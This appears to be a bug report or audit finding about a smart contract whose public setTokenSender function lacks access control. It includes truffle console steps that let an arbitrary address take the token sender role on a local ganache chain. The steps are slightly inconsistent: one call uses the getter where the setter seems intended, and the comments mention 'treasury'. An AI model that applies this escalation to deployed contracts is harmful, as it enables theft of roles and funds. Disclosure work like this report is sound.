The setTokenSender function which is the function that is responsible to set the token sender role is made public with no access control, which makes attacker escalate his privileges to the token sender role
truffle console --networkId 555
compile
user = "choose address from the ganache list"
attacker = "choose address from the ganache list"
TokenSenderCaller.deployed().then(function(instance){app=instance;})
app.setTokenSender(user,{from:user})
app.getTokenSender()
// returns treasury
app.getTokenSender(attacker,{from:attacker})
// will returns the new treasury
Manual
Add access control on the function
The text was updated successfully, but these errors were encountered:
All reactions